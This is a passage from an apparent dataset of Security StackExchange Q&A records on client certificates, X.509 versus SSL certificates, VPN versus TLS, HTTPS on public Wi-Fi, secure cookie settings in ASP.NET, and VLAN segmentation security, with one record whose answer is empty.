]
} |
1,430 | Client browser certificates seem to be a nice way to protect sites from intruders - they are impossible to guess and should be harder to steal. Of course, they do not solve all the problems, but they add security. However, I haven't encountered any public sites using them. Are there sites that use them? Is there some flaw in them that precludes their usage even when security is important, or some other reason why there's so little usage of them? | Client-side certificates just haven't had a good enough cost/benefit tradeoff. They are very confusing to users, so support costs go up. And they are still just bits and thus "something you know", and are vulnerable to a range of software attacks on the browser, the distribution scheme, phishing, etc. Hardware token schemes (two-factor authn) are better for good authn. Single-sign-on (SSO) schemes, potentially federated, and potentially backed by hardware tokens, solve more issues and are easier to deploy. Managing a lot of certificates would be far more complicated for a user than the current thorny multiple-password issue, and browsers don't offer good support for selecting the right certificate. And if a user uses a single cert for lots of sites, then there are privacy issues since use of the certificate identifies the user. Over the decades, a lot of us have thought that the age of end-user PK-crypto was just around the corner, especially those like me enamored of the beauty of RSA. It just turns out that the way it has evolved, the help desk and development costs and subtleties and complexities and legal entanglements of real-world PKI keep eating up the benefits. Equipment seems more expensive than bits, but not if the bits don't do the job, or effective use of them eats up productivity. | {
"source": [
"https://security.stackexchange.com/questions/1430",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/667/"
]
} |
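For the programmatic (non-browser) case the usability problems above largely disappear; a minimal sketch of TLS client-certificate authentication with Python requests, where the URL and file paths are placeholders and the server must be configured to request and verify client certificates:

import requests

resp = requests.get(
    "https://api.example.com/account",
    cert=("/path/to/client.crt", "/path/to/client.key"),   # proves the client's identity
    verify="/path/to/ca-bundle.pem",                        # verifies the server's identity
)
print(resp.status_code)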
1,438 | I am setting up a web service through which my company will talk to a number of business customers' services. We will be exchanging information using SOAP. I would like to handle authentication with SSL certificates provided by both parties, but I'm a bit lost on whether there's a fundamental difference between the types of certificates. When people talk about HTTPS, they talk about getting an SSL certificate from Verisign or another authority. When they talk about client-side authentication, they talk about getting an X.509 certificate. Are these two words for the same thing, can one be turned into the other, or is there some other difference that I'm not grasping? | An X.509 certificate wraps the public key of a public/private key pair. These key pairs can be used for different things, like encryption via SSL, or for identification. SSL certificates are a type of X.509 certificate. SSL works by encrypting traffic as well as verifying the party (Verisign trusts this website to be who they say they are, therefore you probably could too). Verisign acts as a Certificate Authority (CA). The CA is trusted in that everything that it says should be taken as truth (running a CA requires major security considerations). Therefore if a CA gives you a certificate saying that it trusts that you are really you, you have a user certificate/client certificate. Some of these types of certificates can be used across the board, but others can only be used for certain activities. If you open a certificate in Windows (browse to something over SSL in IE and look at the certificate properties) or run certmgr.msc and view a certificate, look at the Details tab > Key Usage. That will dictate what the certificate is allowed to do/be used for. For SOAP, the certificate can be used for two things: identification and encryption. Well, three if you include message signatures (message hashing). Client certificates identify the calling client or user. When the application makes a SOAP request, it hands the certificate to the web service to tell it who is making the request. | {
"source": [
"https://security.stackexchange.com/questions/1438",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/913/"
]
} |
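The "Details tab > Key Usage" check described above can also be done in code; a sketch using a recent version of the Python cryptography package against a PEM file (the path is a placeholder):

from cryptography import x509

with open("/path/to/certificate.pem", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())

print(cert.subject.rfc4514_string())
ku = cert.extensions.get_extension_for_class(x509.KeyUsage).value
print("digital_signature:", ku.digital_signature)
print("key_encipherment: ", ku.key_encipherment)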
1,476 | I would like to design a client-server application where the server is placed on Internet. I assume that I could set up the client-server connection using VPN (is it using IPSec?) or using a SSL connection (possibly https). What are the differences between VPN/IPsec and SSL/https for securing a client server connection over Internet? | VPN means "Virtual Private Network". It is a generic concept which designates a part of a bigger network (e.g. the Internet at large) which is logically isolated from the bigger network through non-hardware means (that's what "virtual" means): it is not that we are using distinct cables and switches; rather, isolation is performed through use of cryptography. SSL (now known as TLS) is a technology which takes a bidirectional transport medium and provides a secured bidirectional medium. It requires the underlying transport medium to be "mostly reliable" (when not attacked, data bytes are transferred in due order, with no loss and no repetition). SSL provides confidentiality, integrity (active alterations are reliably detected), and some authentication (usually server authentication, possibly mutual client-server authentication if using certificates on both sides). So VPN and SSL are not from the same level. A VPN implementation requires some cryptography at some point. Some VPN implementations actually use SSL, resulting in a layered system: the VPN transfers IP packets (of the virtual network) by serializing them on a SSL connection, which itself uses TCP as a transport medium, which is built over IP packets (on the physical unprotected network). IPsec is another technology which is more deeply integrated in the packets, which suppresses some of those layers, and is thus a bit more efficient (less bandwidth overhead). On the other hand, IPsec must be managed quite deep within the operating system network code, while a SSL-based VPN only needs some way to hijack incoming and outgoing traffic; the rest can be down in user-level software. As I understand your question, you have an application where some machines must communicate over the Internet. You have some security requirements, and are thinking about either using SSL (over TCP over IP) or possibly HTTPS (which is HTTP-over-SSL-over-TCP-over-IP), or setting up a VPN between client and server and using "plain" TCP in that private network (the point of the VPN is that is gives you a secure network where you need not worry anymore about confidentiality). With SSL, your connection code must be aware of the security; from a programming point of view, you do not open a SSL connection as if it was "just a socket". Some libraries make it relatively simple, but still, you must manage security at application level. A VPN, on the other hand, is configured at operating system level, so the security is not between your application on the client and your application on the server, but between the client operating system and the server operating system: that's not the same security model, although in many situations the difference turns out not to be relevant. In practice, a VPN means that some configuration step is needed on the client operating system. It is quite invasive. Using two VPN-based applications on the same client may be problematic (security-wise, because the client then acts as a bridge which links together two VPN which should nominally be isolated from each other, and also in practice, because of collisions in address space). 
If the client is a customer, having him configure a VPN properly looks like an impossible task. However, a VPN means that applications need not be aware of security, which makes it much easier to integrate third-party software within your application. | {
"source": [
"https://security.stackexchange.com/questions/1476",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69/"
]
} |
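A sketch of the "security at application level" option discussed above: the client code itself wraps its TCP socket in TLS, rather than relying on an OS-level tunnel (the hostname and port are placeholders):

import socket, ssl

ctx = ssl.create_default_context()     # verifies the server certificate and hostname
with socket.create_connection(("server.example.com", 8443)) as raw:
    with ctx.wrap_socket(raw, server_hostname="server.example.com") as tls:
        tls.sendall(b"hello over TLS\n")
        print(tls.recv(1024))

# With a VPN, by contrast, the application would open a plain TCP socket and
# rely on the operating system's tunnel for confidentiality and integrity.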
1,518 | Firesheep has brought the issue of insecure cookie exchanges to the forefront. How can you ensure that all cookie exchanges are forced to occur only via an SSL-secured connection to the server when you're communicating with a web user? Our scenario is that the web app is written in ASP.NET 4.0 and hosted on Windows Server 2008 R2 running IIS 7.5, if that narrows the scope some. | You can use web.config to force it; the format is (in the <system.web> section) <httpCookies domain="String"
httpOnlyCookies="true|false"
requireSSL="true|false" /> so you really want, at a minimum <httpCookies requireSSL='true'/> But preferably you'll also turn httpOnlyCookies on, unless you're doing some really hooky javascript. | {
"source": [
"https://security.stackexchange.com/questions/1518",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/979/"
]
} |
1,525 | It's often said that HTTPS SSL/TLS connections are encrypted and said to be secure because the communication between the server and me is encrypted (also provides server authentication) so if someone sniffs my packets, they will need zillions of years to decrypt if using brute force in theory. Let's assume I'm on a public wifi and there is a malicious user on the same wifi who sniffs every packet. Now let's assume I'm trying to access my gmail account using this wifi. My browser does a SSL/TLS handshake with the server and gets the keys to use for encryption and decryption. If that malicious user sniffed all my incoming and outgoing packets. Can he calculate the same keys and read my encrypted traffic too or even send encrypted messages to the server in my name? | HTTPS is secure over public hotspots. Only a public key and encrypted messages are transmitted (and these too are signed by root certificates) during the setup of TLS , the security layer used by HTTPS. The client uses the public key to encrypt a master secret, which the server then decrypts with its private key. All data is encrypted with a function that uses the master secret and pseudo-random numbers generated by each side. Thus, the data is secure because it is signed by the master secret and pseudo-random numbers the master secret and pseudo-random numbers are secure because it uses public-private key encryption when the TLS handshake occurs the public-private key encryption is secure because: the private keys are kept secret public-private key encryption is designed to be useless without the private key the public keys are known to be legitimate because they are signed by root certificates, which either came with your computer or were specifically authorized by you (pay attention to browser warnings!) Thus, your HTTPS connections and data are safe as long as: you trust the certificates that come with your computer, you take care to only authorize certificates that you trust. | {
"source": [
"https://security.stackexchange.com/questions/1525",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11662/"
]
} |
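What the client actually verifies during that handshake can be inspected directly; a sketch using Python's ssl module (any HTTPS host will do, Gmail's is used only as an example). A sniffer on the same Wi-Fi sees this handshake too, but cannot derive the session keys without the server's private key:

import socket, ssl

ctx = ssl.create_default_context()     # uses the system trust store
with socket.create_connection(("mail.google.com", 443)) as raw:
    with ctx.wrap_socket(raw, server_hostname="mail.google.com") as tls:
        print("protocol/cipher:", tls.version(), tls.cipher())
        cert = tls.getpeercert()
        print("issued to:", cert["subject"])
        print("issued by:", cert["issuer"])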
1,533 | What issues will we face with the use of network surveillance tool in the company network with respect to the Telecommunication Interception Act and Privacy Act ? And what policies could be implemented to mitigate these issues ? | | {
"source": [
"https://security.stackexchange.com/questions/1533",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/993/"
]
} |
1,551 | I have a network where I have a couple of VLANs. There is a firewall between the 2 VLANs. I am using HP ProCurve switches and have made sure that switch-to-switch links accept tagged frames only and that host ports don't accept tagged frames (they are not "VLAN aware"). I've also made sure that the trunk ports don't have a native VLAN. I've also enabled "Ingress Filtering". Furthermore, I've made sure that host ports are only members of a single VLAN, which is the same as the PVID of the respective port. The only ports which are members of multiple VLANs are the trunk ports. Can someone please explain to me why the above isn't secure? I believe I've addressed the double tagging issue. Update: Both switches are HP ProCurve 1800-24G. This question was IT Security Question of the Week. Read the Apr 20, 2012 blog entry for more details or submit your own Question of the Week. | VLANs are not inherently insecure. I'm writing this from a service provider perspective, where VLANs are the technology used in 99% (statistics made up on the spot) of cases to segment different customers from each other. Residential customers from each other, residential customers from enterprise leased lines, enterprise VPNs from each other, you name it. The VLAN hopping attacks that exist all depend on a few factors: The switch speaks some kind of trunk protocol to you, allowing you to "register" for a different VLAN. This should never, ever occur on a customer port, or someone should get fired. The port is a tagged port, and the switch isn't protected against double tagged packets. This is only an issue if you have customers on VLAN-tagged ports, which you shouldn't. Even then, it's only an issue if you allow untagged packets on trunk ports between switches which, again, you shouldn't. The "packets travel on the same wire" reasoning is valid if the attacker has access to the physical wire in question. If that's the case, you have a lot bigger problems than what VLANs can solve. So, by all means use VLANs as a security measure, but make sure that you never, ever speak VLAN tags with the entities you want segmented from each other, and do keep track of which switch features are enabled on ports facing such entities. | {
"source": [
"https://security.stackexchange.com/questions/1551",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1001/"
]
} |
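A way to test the double-tagging mitigation the question mentions is to craft the frame yourself; a sketch with scapy (requires root, and the interface and VLAN IDs are placeholders — only for testing gear you own):

from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

# Outer tag = the attacker's access VLAN, inner tag = the target VLAN. On a
# vulnerable setup the first switch strips the outer tag and forwards the
# frame onto the inner VLAN.
frame = (Ether(dst="ff:ff:ff:ff:ff:ff")
         / Dot1Q(vlan=10)
         / Dot1Q(vlan=20)
         / IP(dst="10.0.20.255")
         / ICMP())
sendp(frame, iface="eth0")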